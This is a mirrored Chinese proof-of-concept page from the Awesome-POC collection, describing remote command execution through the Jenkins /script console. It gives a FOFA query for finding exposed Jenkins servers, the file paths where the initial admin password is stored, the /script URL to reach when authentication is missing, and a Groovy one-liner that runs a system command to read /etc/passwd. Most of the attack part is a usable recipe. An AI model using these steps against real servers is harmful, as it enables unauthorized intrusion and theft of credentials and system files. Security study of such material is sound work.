mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
40 lines
718 B
Markdown
40 lines
718 B
Markdown
# Jenkins script 远程命令执行漏洞
|
|
|
|
## 漏洞描述
|
|
|
|
Jenkins 登录后访问 /script 页面,其中存在命令执行漏洞,当存在未授权的情况时导致服务器被入侵
|
|
|
|
## 漏洞影响
|
|
|
|
```
|
|
Jenkins
|
|
```
|
|
|
|
## FOFA
|
|
|
|
```
|
|
app="Jenkins"
|
|
```
|
|
|
|
## 漏洞复现
|
|
|
|
账号密码存在于:
|
|
|
|
```
|
|
Linux: /var/lib/jenkins/secrets/initialAdminPassword
|
|
Windows: C:\Users\RabbitMask\.jenkins\secrets\initialAdminPassword
|
|
```
|
|
|
|
登录后台,或在未授权的情况下访问
|
|
|
|
```
|
|
http://xxx.xxx.xxx.xxx/script
|
|
```
|
|
|
|
在脚本命命令模块执行系统命令
|
|
|
|
```
|
|
println 'cat /etc/passwd'.execute().text
|
|
```
|
|
|
|
 |